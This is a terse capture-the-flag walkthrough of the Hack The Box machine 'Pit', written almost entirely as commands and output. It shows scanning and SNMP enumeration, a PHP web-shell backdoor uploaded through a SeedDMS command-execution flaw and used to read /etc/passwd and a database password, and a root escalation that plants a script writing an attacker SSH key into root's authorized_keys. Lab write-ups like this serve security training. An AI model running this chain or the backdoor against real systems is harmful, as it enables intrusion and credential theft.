$ sudo nmap -p- -T4 -A 10.129.132.171
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 6f:c3:40:8f:69:50:69:5a:57:d7:9c:4e:7b:1b:94:96 (RSA)
| 256 c2:6f:f8:ab:a1:20:83:d1:60:ab:cf:63:2d:c8:65:b7 (ECDSA)
|_ 256 6b:65:6c:a6:92:e5:cc:76:17:5a:2f:9a:e7:50:c3:50 (ED25519)
80/tcp open http nginx 1.14.1
|_http-server-header: nginx/1.14.1
|_http-title: Test Page for the Nginx HTTP Server on Red Hat Enterprise Linux
9090/tcp open ssl/zeus-admin?
| fingerprint-strings:
| GetRequest, HTTPOptions:
| HTTP/1.1 400 Bad request
| Content-Type: text/html; charset=utf8
| Transfer-Encoding: chunked
| X-DNS-Prefetch-Control: off
| Referrer-Policy: no-referrer
| X-Content-Type-Options: nosniff
| Cross-Origin-Resource-Policy: same-origin
| <!DOCTYPE html>
| <html>
| <head>
| <title>
| request
| </title>
| <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <style>
| body {
| margin: 0;
| font-family: "RedHatDisplay", "Open Sans", Helvetica, Arial, sans-serif;
| font-size: 12px;
| line-height: 1.66666667;
| color: #333333;
| background-color: #f5f5f5;
| border: 0;
| vertical-align: middle;
| font-weight: 300;
|_ margin: 0 0 10p
| ssl-cert: Subject: commonName=dms-pit.htb/organizationName=4cd9329523184b0ea52ba0d20a1a6f92/countryName=US
| Subject Alternative Name: DNS:dms-pit.htb, DNS:localhost, IP Address:127.0.0.1
$ sudo nmap -sU -p 161,162 --script=snmp-interfaces 10.10.10.241
PORT STATE SERVICE
161/udp open|filtered snmp
162/udp filtered snmptrap
$ echo 10.10.10.241 pit.htb dms-pit.htb | sudo tee -a /etc/hosts
$ dirb http://dms-pit.htb
+ http://dms-pit.htb/akeeba.backend.log (CODE:403|SIZE:571)
+ http://dms-pit.htb/crossdomain.xml (CODE:403|SIZE:571)
+ http://dms-pit.htb/development.log (CODE:403|SIZE:571)
+ http://dms-pit.htb/production.log (CODE:403|SIZE:571)
+ http://dms-pit.htb/sitemap.xml (CODE:403|SIZE:571)
+ http://dms-pit.htb/spamlog.log (CODE:403|SIZE:571)
+ http://dms-pit.htb/web.xml (CODE:403|SIZE:571)
+ http://dms-pit.htb/WS_FTP.LOG (CODE:403|SIZE:571)
$ dirb https://10.10.10.241:9090
--- Scanning URL: https://10.10.10.241:9090/ ----
+ https://10.10.10.241:9090/dana-na (CODE:200|SIZE:468)
+ https://10.10.10.241:9090/favicon.ico (CODE:200|SIZE:819)
+ https://10.10.10.241:9090/ping (CODE:200|SIZE:24)
$ nikto -h dms-pit.htb:9090
Cockpit Version 234 - Server-Side Request Forgery (Unauthenticated) | multiple/webapps/49397.txt
https://github.com/passtheticket/vulnerability-research/blob/main/cockpitProject/README.md
$ snmp-check 10.10.10.241
https://github.com/dheiland-r7/snmp
kali@kali:~/0.htb/machines/Pit241/snmp-master$ sudo cpan -i NetAddr::IP
kali@kali:~/0.htb/machines/Pit241/snmp-master$ perl snmpbw.pl pit.htb public 2 1
SNMP query: 10.10.10.241
Queue count: 0
SNMP SUCCESS: 10.10.10.241
kali@kali:~/0.htb/machines/Pit241/snmp-master$ ./snmpprs.pl results.txt
10.10.10.241.snmp:.1.3.6.1.2.1.25.4.2.1.5.1110 = STRING: "-D -oCiphers=aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128
kali@kali:~/0.htb/machines/Pit241/snmp-master$ less 10.10.10.241.snmp
.1.3.6.1.4.1.2021.9.1.2.2 = STRING: "/var/www/html/seeddms51x/seeddms"
.1.3.6.1.4.1.2021.9.1.3.1 = STRING: "/dev/mapper/cl-root"
.1.3.6.1.4.1.2021.9.1.3.2 = STRING: "/dev/mapper/cl-seeddms"
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.28 = STRING: "michelle user_u s0 *"
.1.3.6.1.4.1.8072.1.3.2.2.1.2.10.109.111.110.105.116.111.114.105.110.103 = STRING: "/usr/bin/monitor"
seeddms document management system
http://dms-pit.htb/seeddms51x/seeddms/out/
michelle/michelle
$ searchsploit seeddms
SeedDMS versions < 5.1.11 - Remote Command Execution | php/webapps/47022.txt
PHP Backdoor Code:
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
upload it and get documentid=30
http://dms-pit.htb/seeddms51x/data/1048576/30/1.php?cmd=cat+/etc/passwd
root:x:0:0:root:/root:/bin/bash
michelle:x:1000:1000::/home/michelle:/bin/bash
http://dms-pit.htb/seeddms51x/data/1048576/30/1.php?cmd=cat+../../../conf/settings.xml
view-source:http://dms-pit.htb/seeddms51x/data/1048576/30/1.php?cmd=cat+../../../conf/settings.xml
<database dbDriver="mysql" dbHostname="localhost" dbDatabase="seeddms" dbUser="seeddms" dbPass="ied^ieY6xoquu" doNotCheckVersion="false">
</database>
https://pit.htb:9090/system
https://pit.htb:9090/system/terminal
seeddms / ied^ieY6xoquu
[michelle@pit ~]$ whoami
michelle
[michelle@pit ~]$ ls -la
total 20
drwx------. 2 michelle michelle 129 Apr 18 2020 .
drwxr-xr-x. 3 root root 22 Nov 3 2020 ..
lrwxrwxrwx. 1 root root 9 May 10 10:56 .bash_history -> /dev/null
-rw-r--r--. 1 michelle michelle 18 Nov 8 2019 .bash_logout
-rw-r--r--. 1 michelle michelle 141 Nov 8 2019 .bash_profile
-rw-r--r--. 1 michelle michelle 312 Nov 8 2019 .bashrc
lrwxrwxrwx. 1 root root 9 May 10 10:56 .lesshst -> /dev/null
-r--------. 1 michelle michelle 33 Jun 16 00:59 user.txt
-rw-r--r--. 1 michelle michelle 658 Mar 20 2020 .zshrc
[michelle@pit ~]$ cat user.txt
b33ae1d85dd131b9c4d31d3b2b3b0923
[michelle@pit ~]$
[michelle@pit ~]$ cat /usr/bin/monitor
#!/bin/bash
for script in /usr/local/monitoring/check*sh
do
/bin/bash $script
done
[michelle@pit ~]$
[michelle@pit ~]$ ls -la /usr/local
drwxrwx---+ 2 root root 183 Jun 16 12:35 monitoring
[michelle@pit ~]$ getfacl /usr/local/monitoring
getfacl: Removing leading '/' from absolute path names
# file: usr/local/monitoring
# owner: root
# group: root
user::rwx
user:michelle:-wx
group::rwx
mask::rwx
other::---
[michelle@pit ~]$ vi check_2.sh
[michelle@pit ~]$ ll
total 8
-rw-rw-r--. 1 michelle michelle 616 Jun 16 12:47 check_2.sh
-r--------. 1 michelle michelle 33 Jun 16 00:59 user.txt
[michelle@pit ~]$ cp check_2.sh /usr/local/monitoring/
[michelle@pit ~]$ cat /usr/local/monitoring/check_2.sh
!#/bin/bash
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDeYZ9sJVrH4IfMx50cZSfpnsdi98SgU4WtQHUjXcyHsx9jD5RJaviSdt3JijTSP4+ctXbMoZWqv/dDFKSN3N2aG8U2gjhaabAzQU8ICo4Ow/qZNlyNLW4mD7SJK44rmga6c03PsygOH+E0UQpW/cOgUym7Oaj0qYL5caN0q/0b5lJqTsMpxOmUz6+TXFiVH+PjaLb5RJo8YRbGZN51cY9/hFmuXuNuXfGRPNS7VAaun9Cu+tLqgx334GvqriUdU6HxT5N/wkTy4wum/Oi94/o4rzbLTZYhCpQMtm1k1CVht9YO6RpjioB3hUTKR7UKtgBoo6d0fNVZld0kRP8jf9l995/6QOfUGbCK2eHAxKdBqFqa5cdRMezFE1DrVDrNX1dbYHJOs8QFJMp042Q+ecoORleFfhVA5ZtcGTsXkA9peXC9SAkec3PtuUEULXS5ait6hEqQk7Tzps4j8LG+vtL3TTWZDLN/4MVLudWZi8Y4or7yrCTwh7HKFfiWR2NG//E= kali@kali" > /root/.ssh/authorized_keys
id
$\> snmpwalk -v 1 -c public pit.htb 1.3.6.1.4.1.8072.1.3.2.2.1.2
sudo snmpwalk -m +MY-MIB -v2c -c public pit.htb nsExtendObjects
kali@kali:~/0.htb/machines/Pit241$ ssh root@pit.htb
Web console: https://pit.htb:9090/
Last login: Wed Jun 16 19:07:45 2021 from 10.10.16.40
[root@pit ~]# ls -la
total 28
dr-xr-x---. 5 root root 225 May 10 11:07 .
drwxr-xr-x. 17 root root 224 May 10 10:56 ..
lrwxrwxrwx. 1 root root 9 May 10 10:56 .bash_history -> /dev/null
-rw-r--r--. 1 root root 18 May 11 2019 .bash_logout
-rw-r--r--. 1 root root 176 May 11 2019 .bash_profile
-rw-r--r--. 1 root root 176 May 11 2019 .bashrc
-rwx------. 1 root root 706 Apr 22 2020 cleanup.sh
drwx------. 3 root root 20 Apr 17 2020 .config
-rw-r--r--. 1 root root 100 May 11 2019 .cshrc
drwx------. 2 root root 122 Apr 18 2020 monitoring
lrwxrwxrwx. 1 root root 9 May 10 10:56 .mysql_history -> /dev/null
lrwxrwxrwx. 1 root root 9 May 10 11:07 null -> /dev/null
-r--------. 1 root root 33 Jun 16 00:59 root.txt
drwx------. 2 root root 29 Apr 18 2020 .ssh
-rw-r--r--. 1 root root 129 May 11 2019 .tcshrc
[root@pit ~]# cat root.txt
b1ddce1bde45526e07f9ca4c494ab757
[root@pit ~]#